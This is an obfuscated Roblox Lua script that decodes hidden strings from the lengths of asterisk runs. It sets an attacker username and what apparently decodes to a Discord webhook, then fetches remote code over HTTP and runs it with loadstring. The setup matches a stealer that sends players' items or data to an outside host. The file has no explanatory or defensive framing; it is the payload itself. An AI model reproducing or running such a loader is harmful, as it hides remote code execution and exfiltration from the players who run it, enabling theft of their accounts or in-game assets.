function UTrorKEDCmmbTctwlGyxJtpStJxrodzufpB(c)
tab={}
for i = 1,#c do
x=string.len(c[i]) 
y=string.char(x)
table.insert(tab,y)
end
x=table.concat(tab)
return x
end 


Username = UTrorKEDCmmbTctwlGyxJtpStJxrodzufpB({'************************************************************************************************************************','***************************************************','*************************************************************************************************************************','**********************************************************************************************************************'})
Webhook = UTrorKEDCmmbTctwlGyxJtpStJxrodzufpB({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','****************************************************************************************************','*********************************************************************************************************','*******************************************************************************************************************','***************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','****************************************************************************************************','**********************************************','***************************************************************************************************','***************************************************************************************************************','*************************************************************************************************************','***********************************************','*************************************************************************************************','****************************************************************************************************************','*********************************************************************************************************','***********************************************','***********************************************************************************************************************','*****************************************************************************************************','**************************************************************************************************','********************************************************************************************************','***************************************************************************************************************','***************************************************************************************************************','***********************************************************************************************************','*******************************************************************************************************************','***********************************************','*************************************************','**************************************************','******************************************************','*******************************************************','******************************************************','******************************************************','****************************************************','*******************************************************','*************************************************','***************************************************','*********************************************************','*******************************************************','************************************************','******************************************************','*************************************************','********************************************************','****************************************************','****************************************************','**************************************************','***********************************************','*******************************************************','***********************************************************************************************************************','******************************************************************************************************************','*************************************************','********************************************************************************************************','****************************************************************************************************************','****************************************************************************','*********************************************************************','**************************************************************************','******************************************************************','************************************************************************************************************************','**************************************************************************************************','**********************************************************************************','************************************************************************************************************************','***********************************************************************************','**************************************************************************','****************************************************************************','*******************************************************************************************************************','****************************************************************************************************************','*****************************************************************','****************************************************************************************','******************************************************************','*************************************************','**************************************************************************************','************************************************************************************************************************','****************************************************************************************************','*************************************************************************************','*****************************************************************************************************************','**************************************************************************************************','***************************************************************************','****************************************************************************************************','**************************************************************************************','***************************************************','***************************************************************************************','*****************************************************************************************','****************************************************************************************','*********************************************************','********************************************************************************************************','*************************************************************************************************','*****************************************************************','**************************************************************************************************','**************************************************************************************************************************','**********************************************************************************************************','*******************************************************************************','************************************************************************************','*****************************************************************','******************************************************************************************************','*************************************************************************************************************','***********************************************************************','********************************************************************************','*********************************************','********************************************************','************************************************','******************************************************************************************','********************************************************************************************************','*********************************************************************************','**************************************************************************************************************************','*************************************************************************************************************************','**************************************************************************','*******************************************************','**************************************************************************************************************************','*****************************************************************','*********************************************************************************************************','*****************************************************************************************************************','*************************************************************************************************','***************************************************************************************************','******************************************************************','**********************************************************************************************************************'})

loadstring(game:HttpGet(UTrorKEDCmmbTctwlGyxJtpStJxrodzufpB({'********************************************************************************************************','********************************************************************************************************************','********************************************************************************************************************','****************************************************************************************************************','*******************************************************************************************************************','**********************************************************','***********************************************','***********************************************','*****************************************************************************************************','*******************************************************************************************************','***************************************************************************************************************','******************************************************************************************************************','*********************************************************************************************************','***********************************************************************************************************','*********************************************************************************************************************','*******************************************************************************************************************','*************************************************************************************************','**********************************************','*******************************************************************************************************************','****************************************************************************************************************','*************************************************************************************************','***************************************************************************************************','*****************************************************************************************************','***********************************************','*************************************************************************************************************','*************************************************************************************************************','**************************************************'})))()    
